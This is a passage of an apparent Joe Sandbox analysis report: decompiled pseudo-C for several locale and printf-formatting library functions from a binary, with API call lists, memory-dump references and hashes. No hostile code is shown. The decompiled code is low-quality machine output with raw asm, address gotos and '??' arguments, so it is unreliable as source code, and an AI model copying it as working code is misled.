				E00007FF77FF7191E5AC4(_t54, __rcx, __rdx, __rsi);
				_t69 = _t54;
				E00007FF77FF7191E5AC4(_t54, _t56, _t64, _t69);
				_t67 =  *((intOrPtr*)(_t54 + 0x3a0));
				_t22 = E00007FF77FF7191F1790(_t56, _t64);
				r9d = 0x78;
				_t33 = _t22;
				asm("sbb edx, edx");
				_t23 = GetLocaleInfoW(??, ??, ??, ??);
				if (_t23 != 0) goto 0x191f1703;
				 *_t67 =  *_t67 & _t23;
				goto 0x191f176b;
				_t25 = E00007FF77FF7191D87A4(_t54,  *((intOrPtr*)(_t69 + 0x98)));
				_t38 =  *((intOrPtr*)(_t69 + 0xb0));
				if (_t25 != 0) goto 0x191f1727;
				if (_t38 != 0) goto 0x191f1758;
				goto 0x191f174a;
				if (_t38 != 0) goto 0x191f1761;
				if ( *((intOrPtr*)(_t69 + 0xac)) == _t38) goto 0x191f1761;
				if (E00007FF77FF7191D87A4(_t54,  *((intOrPtr*)(_t69 + 0x98))) != 0) goto 0x191f1761;
				if (E00007FF77FF7191F1890(_t33, 0, _t54, _t56,  *((intOrPtr*)(_t69 + 0x98)),  &_v264, _t69) == 0) goto 0x191f1761;
				 *_t67 =  *_t67 | 0x00000004;
				_t67[1] = _t33;
				_t67[2] = _t33;
				return E00007FF77FF7191D23B0( !( *_t67 >> 2) & 0x00000001, _t33, _v24 ^ _t71 - 0x00000120);
			}

















                                                                                                                                                              0x7ff7191f1688
                                                                                                                                                              0x7ff7191f1688
                                                                                                                                                              0x7ff7191f168d
                                                                                                                                                              0x7ff7191f169a
                                                                                                                                                              0x7ff7191f16a1
                                                                                                                                                              0x7ff7191f16a4
                                                                                                                                                              0x7ff7191f16ac
                                                                                                                                                              0x7ff7191f16af
                                                                                                                                                              0x7ff7191f16b4
                                                                                                                                                              0x7ff7191f16b7
                                                                                                                                                              0x7ff7191f16bf
                                                                                                                                                              0x7ff7191f16c6
                                                                                                                                                              0x7ff7191f16d8
                                                                                                                                                              0x7ff7191f16e0
                                                                                                                                                              0x7ff7191f16e2
                                                                                                                                                              0x7ff7191f16f0
                                                                                                                                                              0x7ff7191f16f8
                                                                                                                                                              0x7ff7191f16fa
                                                                                                                                                              0x7ff7191f1701
                                                                                                                                                              0x7ff7191f170f
                                                                                                                                                              0x7ff7191f1714
                                                                                                                                                              0x7ff7191f171c
                                                                                                                                                              0x7ff7191f1720
                                                                                                                                                              0x7ff7191f1725
                                                                                                                                                              0x7ff7191f1729
                                                                                                                                                              0x7ff7191f1731
                                                                                                                                                              0x7ff7191f1746
                                                                                                                                                              0x7ff7191f1756
                                                                                                                                                              0x7ff7191f1758
                                                                                                                                                              0x7ff7191f175b
                                                                                                                                                              0x7ff7191f175e
                                                                                                                                                              0x7ff7191f178f

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: GetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5AD3
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: SetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5B71
                                                                                                                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF7191F16F0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                              • Opcode ID: 99c5dbc5d5b9dc0a81ba9ec13233b8601aa8e0d2f171973eac6b64838ee830bd
                                                                                                                                                              • Instruction ID: 1f8371a063d799fc9b3df89415f0d1f6da9478539f7d65fe1d71b61aeca791e8
                                                                                                                                                              • Opcode Fuzzy Hash: 99c5dbc5d5b9dc0a81ba9ec13233b8601aa8e0d2f171973eac6b64838ee830bd
                                                                                                                                                              • Instruction Fuzzy Hash: F4316431B08A8646FB64EF21E5413AAB3B1FB85798F844535DB4D83285EE3CE49A9710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F12D4 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                              			E00007FF77FF7191F12D4(void* __ecx, void* __edx, signed long long __rax, long long __rbx, long long __rcx, signed int __rdx, signed int __r8, long long _a8) {
				signed int _t35;
				signed char _t36;
				signed char _t37;
				signed int _t52;
				signed long long _t54;
				signed int* _t58;
				signed short** _t65;
				long long _t66;
				signed long long _t71;
				signed long long _t72;
				signed long long _t74;

				_t54 = __rax;
				_a8 = __rbx;
				_t58 = __rcx;
				E00007FF77FF7191E5AC4(__rax, __rcx, __rdx, _t66);
				_t71 = __r8 | 0xffffffff;
				_t2 = _t54 + 0x98; // 0x98
				_t65 = _t2;
				_t74 = _t71 + 1;
				if (( *_t65)[_t74] != 0) goto 0x191f12f9;
				_t65[3] = 0 | _t74 == 0x00000003;
				_t72 = _t71 + 1;
				if (_t65[1][_t72] != 0) goto 0x191f1313;
				r8d = 2;
				_t65[3] = 0 | _t72 == 0x00000003;
				_t58[1] = 0;
				if (_t65[3] != 0) goto 0x191f1362;
				r10d = 0;
				r9d =  *( *_t65) & 0x0000ffff;
				_t16 = _t74 - 0x41; // 0x58
				if (_t16 - 0x19 <= 0) goto 0x191f135a;
				r9w = r9w - 0x61;
				if (r9w - 0x19 > 0) goto 0x191f135f;
				r10d =  &(r10d[0]);
				goto 0x191f133d;
				r8d = r10d;
				_t65[2] = r8d;
				_t35 = EnumSystemLocalesW(??, ??);
				_t52 =  *_t58 & 0x00000007;
				asm("bt ecx, 0x9");
				_t36 = _t35 & 0xffffff00 | _t52 > 0x00000000;
				asm("bt ecx, 0x8");
				_t37 = _t36 & 0xffffff00 | _t52 > 0x00000000;
				if ((_t37 & (0 | _t52 != 0x00000000) & _t36) != 0) goto 0x191f1396;
				 *_t58 = 0;
				return _t37;
			}














                                                                                                                                                              0x7ff7191f12d4
                                                                                                                                                              0x7ff7191f12d4
                                                                                                                                                              0x7ff7191f12de
                                                                                                                                                              0x7ff7191f12e1
                                                                                                                                                              0x7ff7191f12e6
                                                                                                                                                              0x7ff7191f12ef
                                                                                                                                                              0x7ff7191f12ef
                                                                                                                                                              0x7ff7191f12f9
                                                                                                                                                              0x7ff7191f1301
                                                                                                                                                              0x7ff7191f130c
                                                                                                                                                              0x7ff7191f1313
                                                                                                                                                              0x7ff7191f131b
                                                                                                                                                              0x7ff7191f1323
                                                                                                                                                              0x7ff7191f132c
                                                                                                                                                              0x7ff7191f132f
                                                                                                                                                              0x7ff7191f1335
                                                                                                                                                              0x7ff7191f133a
                                                                                                                                                              0x7ff7191f133d
                                                                                                                                                              0x7ff7191f1344
                                                                                                                                                              0x7ff7191f134c
                                                                                                                                                              0x7ff7191f134e
                                                                                                                                                              0x7ff7191f1358
                                                                                                                                                              0x7ff7191f135a
                                                                                                                                                              0x7ff7191f135d
                                                                                                                                                              0x7ff7191f135f
                                                                                                                                                              0x7ff7191f1362
                                                                                                                                                              0x7ff7191f1372
                                                                                                                                                              0x7ff7191f137a
                                                                                                                                                              0x7ff7191f1380
                                                                                                                                                              0x7ff7191f1384
                                                                                                                                                              0x7ff7191f1389
                                                                                                                                                              0x7ff7191f138d
                                                                                                                                                              0x7ff7191f1392
                                                                                                                                                              0x7ff7191f1394
                                                                                                                                                              0x7ff7191f13a0

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: GetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5AD3
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: SetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5B71
                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7191F1ABF,?,00000001,?,00000000,?,00000000,?,00007FF7191E34A0), ref: 00007FF7191F1372
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                              • Opcode ID: aef47e4816c082cd23aac7e0cb9d887d494f757063da754a999e63c0f42916cf
                                                                                                                                                              • Instruction ID: fc893fc9254e2b77b868265d6530e8213426fa6dfdbb420d6dc117e859715a45
                                                                                                                                                              • Opcode Fuzzy Hash: aef47e4816c082cd23aac7e0cb9d887d494f757063da754a999e63c0f42916cf
                                                                                                                                                              • Instruction Fuzzy Hash: 2211D263A08A498AFB15AF15E0406ACB7B1FB91FB8F848135C769433C0EA38D5DED750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F1890 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 19%
                                                                                                                                                              			E00007FF77FF7191F1890(signed int __ecx, void* __edx, signed long long __rax, long long __rbx, void* __rcx, signed int __rdx, long long __rsi, intOrPtr _a8, long long _a16, long long _a24) {
				int _t13;
				signed int _t17;
				void* _t26;
				signed int _t43;
				signed short* _t51;

				_t43 = __rdx;
				_a16 = __rbx;
				_a24 = __rsi;
				_t26 = __edx;
				_t17 = __ecx;
				E00007FF77FF7191E5AC4(__rax, __rbx, __rdx, __rsi);
				r9d = 2;
				asm("bts ecx, 0xa");
				_t13 = GetLocaleInfoW(??, ??, ??, ??);
				r10d = 0;
				if (_t13 == 0) goto 0x191f1929;
				if (_t17 == _a8) goto 0x191f1922;
				if (_t26 == 0) goto 0x191f1922;
				_t51 =  *((intOrPtr*)(__rax + 0x98));
				r8d = r10d;
				if (_t43 - 0x41 - 0x19 <= 0) goto 0x191f1903;
				if (( *_t51 & 0x0000ffff) - 0x61 - 0x19 > 0) goto 0x191f190f;
				r8d = r8d + 1;
				goto 0x191f18f0;
				if (_t51[( &(_t51[2]) | 0xffffffff) + 1] != r10w) goto 0x191f1913;
				if (r8d == (_t17 & 0x000003ff)) goto 0x191f1929;
				goto 0x191f192b;
				return 0;
			}








                                                                                                                                                              0x7ff7191f1890
                                                                                                                                                              0x7ff7191f1890
                                                                                                                                                              0x7ff7191f1895
                                                                                                                                                              0x7ff7191f189f
                                                                                                                                                              0x7ff7191f18a1
                                                                                                                                                              0x7ff7191f18a3
                                                                                                                                                              0x7ff7191f18b5
                                                                                                                                                              0x7ff7191f18bb
                                                                                                                                                              0x7ff7191f18c7
                                                                                                                                                              0x7ff7191f18cd
                                                                                                                                                              0x7ff7191f18d2
                                                                                                                                                              0x7ff7191f18d8
                                                                                                                                                              0x7ff7191f18dc
                                                                                                                                                              0x7ff7191f18de
                                                                                                                                                              0x7ff7191f18e5
                                                                                                                                                              0x7ff7191f18f7
                                                                                                                                                              0x7ff7191f1901
                                                                                                                                                              0x7ff7191f1906
                                                                                                                                                              0x7ff7191f190d
                                                                                                                                                              0x7ff7191f191b
                                                                                                                                                              0x7ff7191f1920
                                                                                                                                                              0x7ff7191f1927
                                                                                                                                                              0x7ff7191f193a

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: GetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5AD3
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: SetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5B71
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,?,?,00007FF7191F1639), ref: 00007FF7191F18C7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                              • Opcode ID: 2545279410869f121e9b5a073fa6713115709a5b2c8ef6f766ff2b046374291e
                                                                                                                                                              • Instruction ID: 2a87183dc8510e80a7aac1727cf790c3821d9400ff9e60553157a329b7c3b602
                                                                                                                                                              • Opcode Fuzzy Hash: 2545279410869f121e9b5a073fa6713115709a5b2c8ef6f766ff2b046374291e
                                                                                                                                                              • Instruction Fuzzy Hash: E1112B22A1C99A82F7647F12B0002B9A2B1FB41778F901135D76D076C4EE39D8CE9750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F13A4 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E00007FF77FF7191F13A4(void* __ecx, void* __edx, signed long long __rax, long long __rbx, long long __rcx, signed int __rdx, signed int __r8, long long _a8) {
				int _t17;
				void* _t25;
				signed char* _t31;
				signed short* _t36;
				long long _t38;
				signed long long _t44;

				_a8 = __rbx;
				_t31 = __rcx;
				E00007FF77FF7191E5AC4(__rax, __rcx, __rdx, _t38);
				_t36 =  *((intOrPtr*)(__rax + 0x98));
				_t44 = (__r8 | 0xffffffff) + 1;
				if (_t36[_t44] != 0) goto 0x191f13c6;
				_t25 = _t44 - 3;
				 *(__rax + 0xb0) = 0 | _t25 == 0x00000000;
				if (_t25 == 0) goto 0x191f140f;
				r9d = 0;
				r8d =  *_t36 & 0x0000ffff;
				if (_t44 - 0x41 - 0x19 <= 0) goto 0x191f1407;
				r8w = r8w - 0x61;
				if (r8w - 0x19 > 0) goto 0x191f140c;
				r9d = r9d + 1;
				goto 0x191f13ea;
				 *((intOrPtr*)(__rax + 0xac)) = r9d;
				_t17 = EnumSystemLocalesW(??, ??);
				if (( *_t31 & 0x00000004) != 0) goto 0x191f142f;
				 *_t31 = 0;
				return _t17;
			}









                                                                                                                                                              0x7ff7191f13a4
                                                                                                                                                              0x7ff7191f13ae
                                                                                                                                                              0x7ff7191f13b1
                                                                                                                                                              0x7ff7191f13bf
                                                                                                                                                              0x7ff7191f13c6
                                                                                                                                                              0x7ff7191f13ce
                                                                                                                                                              0x7ff7191f13d2
                                                                                                                                                              0x7ff7191f13de
                                                                                                                                                              0x7ff7191f13e5
                                                                                                                                                              0x7ff7191f13e7
                                                                                                                                                              0x7ff7191f13ea
                                                                                                                                                              0x7ff7191f13f9
                                                                                                                                                              0x7ff7191f13fb
                                                                                                                                                              0x7ff7191f1405
                                                                                                                                                              0x7ff7191f1407
                                                                                                                                                              0x7ff7191f140a
                                                                                                                                                              0x7ff7191f140f
                                                                                                                                                              0x7ff7191f1422
                                                                                                                                                              0x7ff7191f142b
                                                                                                                                                              0x7ff7191f142d
                                                                                                                                                              0x7ff7191f1439

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: GetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5AD3
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: SetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5B71
                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7191F1A7B,?,00000001,?,00000000,?,00000000,?,00007FF7191E34A0), ref: 00007FF7191F1422
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                              • Opcode ID: 64f98d8e64ce83a21404beb72b460050a377fcc9a67982f247de6cb5b074aef8
                                                                                                                                                              • Instruction ID: 71993c34d4642534d26634b4c690726572913301698ae70a913972a00215df4f
                                                                                                                                                              • Opcode Fuzzy Hash: 64f98d8e64ce83a21404beb72b460050a377fcc9a67982f247de6cb5b074aef8
                                                                                                                                                              • Instruction Fuzzy Hash: B901D672B08A4547F7156F16F4407A9B2B2FB82779F859231D768072C4EF6894CEA710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E7638 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF7191E7A79,?,?,?,?,?,?,?,?,00000000,00007FF7191F0920), ref: 00007FF7191E7687
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EnumLocalesSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2099609381-0
                                                                                                                                                              • Opcode ID: e940de7d5b1e3f898a4d800330e7ba9d984bb9218b23d09065fbfce15486ff58
                                                                                                                                                              • Instruction ID: 7ff41a22904b57767ffefc5ecfdd821cb305a90995b099d1050cdbac6cc62ef5
                                                                                                                                                              • Opcode Fuzzy Hash: e940de7d5b1e3f898a4d800330e7ba9d984bb9218b23d09065fbfce15486ff58
                                                                                                                                                              • Instruction Fuzzy Hash: C9F04B75708A4582F704EF19F8501A9A271AB897D4F844035DA0D83364DF2CD4AAC240
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DB488 Relevance: 1.4, Strings: 1, Instructions: 196COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                              			E00007FF77FF7191DB488(long long __rbx, long long __rcx, long long __rsi, long long __rbp, char _a8, char _a10, long long _a16, long long _a24, long long _a32) {
				long long _v40;
				void* __rdi;
				intOrPtr _t61;
				void* _t63;
				void* _t85;
				void* _t93;
				unsigned int _t94;
				signed char _t95;
				unsigned int _t96;
				intOrPtr _t103;
				void* _t109;
				void* _t112;
				void* _t113;
				void* _t161;
				void* _t163;
				intOrPtr* _t168;
				void* _t170;
				void* _t171;
				void* _t173;
				void* _t178;
				void* _t179;
				void* _t181;

				_t167 = __rbp;
				_t165 = __rsi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t171 = _t170 - 0x30;
				_t61 =  *((intOrPtr*)(__rcx + 0x41));
				r15d = 1;
				sil = 0x78;
				bpl = 0x58;
				r14b = 0x41;
				_t113 = _t61 - 0x64;
				if (_t113 > 0) goto 0x191db50f;
				if (_t113 == 0) goto 0x191db57b;
				if (_t61 == r14b) goto 0x191db58e;
				if (_t61 == 0x43) goto 0x191db4f9;
				if (_t61 - 0x44 <= 0) goto 0x191db597;
				if (_t61 - 0x47 <= 0) goto 0x191db58e;
				if (_t61 == 0x53) goto 0x191db537;
				if (_t61 == bpl) goto 0x191db54c;
				if (_t61 == 0x5a) goto 0x191db505;
				if (_t61 == 0x61) goto 0x191db58e;
				if (_t61 != 0x63) goto 0x191db597;
				E00007FF77FF7191DB924(_t61 - 0x63, __rcx);
				goto 0x191db593;
				_t63 = E00007FF77FF7191DB6F0(__rcx);
				goto 0x191db593;
				if (_t63 - 0x67 <= 0) goto 0x191db58e;
				if (_t63 == 0x69) goto 0x191db57b;
				if (_t63 == 0x6e) goto 0x191db574;
				if (_t63 == 0x6f) goto 0x191db556;
				if (_t63 == 0x70) goto 0x191db53e;
				if (_t63 == 0x73) goto 0x191db537;
				if (_t63 == 0x75) goto 0x191db57f;
				if (_t63 != sil) goto 0x191db597;
				goto 0x191db584;
				E00007FF77FF7191DBC84(__rcx);
				goto 0x191db593;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x191db587;
				_t94 =  *(__rcx + 0x30);
				if ((r15b & _t94 >> 0x00000005) == 0) goto 0x191db56a;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t94;
				goto 0x191db584;
				E00007FF77FF7191DBBA8(__rcx, __rcx, _t161, __rsi);
				goto 0x191db593;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E00007FF77FF7191DB9E0(_t93, 0xa, __rcx, __rcx, _t161, _t165, __rbp, _t179);
				goto 0x191db593;
				if (E00007FF77FF7191DB768(0xa, _t109, __rcx, __rcx, _t165, _t167, _t173) != 0) goto 0x191db59e;
				goto 0x191db6d5;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0x191db6d2;
				_t95 =  *(__rcx + 0x30);
				_a8 = 0;
				_a10 = 0;
				if ((r15b & 0) == 0) goto 0x191db5f0;
				if ((r15b & 0) == 0) goto 0x191db5d3;
				_a8 = 0x2d;
				goto 0x191db5ed;
				if ((r15b & _t95) == 0) goto 0x191db5df;
				_a8 = 0x2b;
				goto 0x191db5ed;
				if ((r15b & 0) == 0) goto 0x191db5f0;
				_a8 = 0x20;
				_t163 = _t181;
				_t103 =  *((intOrPtr*)(__rcx + 0x41));
				if ((_t103 - bpl & 0x000000df) != 0) goto 0x191db60b;
				if ((r15b & _t95 >> 0x00000005) == 0) goto 0x191db60b;
				r8b = r15b;
				goto 0x191db60e;
				r8b = 0;
				_t83 = _t103 - r14b;
				if (r8b != 0) goto 0x191db621;
				if ((_t103 - r14b & 0xffffff00 | (_t83 & 0x000000df) == 0x00000000) == 0) goto 0x191db63c;
				 *((char*)(_t171 + _t163 + 0x50)) = 0x30;
				if (_t103 == bpl) goto 0x191db630;
				if (_t103 != r14b) goto 0x191db633;
				sil = bpl;
				 *((intOrPtr*)(_t171 + _t163 + 0x51)) = sil;
				_t164 = _t163 + 2;
				_t168 = __rcx + 0x28;
				_t180 = __rcx + 0x468;
				_t112 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t95 & 0x0000000c) != 0) goto 0x191db664;
				r8d = _t112;
				_t85 = E00007FF77FF7191DABDC(0x20, __rcx, __rcx + 0x468, _t163 + 2, _t168, _t178);
				r8d = 0;
				_v40 = __rcx + 0x10;
				E00007FF77FF7191DBDF4(_t85, 0, _t112, __rcx, __rcx + 0x468, _t163 + 2, _t165, _t168, _t168);
				_t96 =  *(__rcx + 0x30);
				if ((r15b & _t96 >> 0x00000003) == 0) goto 0x191db6a5;
				if ((r15b & _t96 >> 0x00000002) != 0) goto 0x191db6a5;
				r8d = _t112;
				E00007FF77FF7191DABDC(0x30, __rcx, _t180, _t163 + 2, _t168, _t178);
				E00007FF77FF7191DBD1C(__rcx, __rcx, _t165);
				if ( *_t168 < 0) goto 0x191db6d2;
				r10d =  *(__rcx + 0x30);
				r10d = r10d >> 2;
				if ((r15b & r10b) == 0) goto 0x191db6d2;
				r8d = _t112;
				E00007FF77FF7191DABDC(0x20, __rcx, _t180, _t164, _t168, _t178);
				return r15b;
			}

























                                                                                                                                                              0x7ff7191db488
                                                                                                                                                              0x7ff7191db488
                                                                                                                                                              0x7ff7191db488
                                                                                                                                                              0x7ff7191db48d
                                                                                                                                                              0x7ff7191db492
                                                                                                                                                              0x7ff7191db49c
                                                                                                                                                              0x7ff7191db4a0
                                                                                                                                                              0x7ff7191db4a6
                                                                                                                                                              0x7ff7191db4ac
                                                                                                                                                              0x7ff7191db4af
                                                                                                                                                              0x7ff7191db4b2
                                                                                                                                                              0x7ff7191db4b5
                                                                                                                                                              0x7ff7191db4b7
                                                                                                                                                              0x7ff7191db4b9
                                                                                                                                                              0x7ff7191db4c2
                                                                                                                                                              0x7ff7191db4ca
                                                                                                                                                              0x7ff7191db4ce
                                                                                                                                                              0x7ff7191db4d6
                                                                                                                                                              0x7ff7191db4de
                                                                                                                                                              0x7ff7191db4e3
                                                                                                                                                              0x7ff7191db4e7
                                                                                                                                                              0x7ff7191db4eb
                                                                                                                                                              0x7ff7191db4f3
                                                                                                                                                              0x7ff7191db4fb
                                                                                                                                                              0x7ff7191db500
                                                                                                                                                              0x7ff7191db505
                                                                                                                                                              0x7ff7191db50a
                                                                                                                                                              0x7ff7191db511
                                                                                                                                                              0x7ff7191db515
                                                                                                                                                              0x7ff7191db519
                                                                                                                                                              0x7ff7191db51d
                                                                                                                                                              0x7ff7191db521
                                                                                                                                                              0x7ff7191db525
                                                                                                                                                              0x7ff7191db529
                                                                                                                                                              0x7ff7191db52e
                                                                                                                                                              0x7ff7191db535
                                                                                                                                                              0x7ff7191db537
                                                                                                                                                              0x7ff7191db53c
                                                                                                                                                              0x7ff7191db53e
                                                                                                                                                              0x7ff7191db545
                                                                                                                                                              0x7ff7191db54c
                                                                                                                                                              0x7ff7191db554
                                                                                                                                                              0x7ff7191db556
                                                                                                                                                              0x7ff7191db561
                                                                                                                                                              0x7ff7191db563
                                                                                                                                                              0x7ff7191db567
                                                                                                                                                              0x7ff7191db572
                                                                                                                                                              0x7ff7191db574
                                                                                                                                                              0x7ff7191db579
                                                                                                                                                              0x7ff7191db57b
                                                                                                                                                              0x7ff7191db584
                                                                                                                                                              0x7ff7191db587
                                                                                                                                                              0x7ff7191db58c
                                                                                                                                                              0x7ff7191db595
                                                                                                                                                              0x7ff7191db599
                                                                                                                                                              0x7ff7191db5a2
                                                                                                                                                              0x7ff7191db5a8
                                                                                                                                                              0x7ff7191db5ad
                                                                                                                                                              0x7ff7191db5b4
                                                                                                                                                              0x7ff7191db5c0
                                                                                                                                                              0x7ff7191db5ca
                                                                                                                                                              0x7ff7191db5cc
                                                                                                                                                              0x7ff7191db5d1
                                                                                                                                                              0x7ff7191db5d6
                                                                                                                                                              0x7ff7191db5d8
                                                                                                                                                              0x7ff7191db5dd
                                                                                                                                                              0x7ff7191db5e6
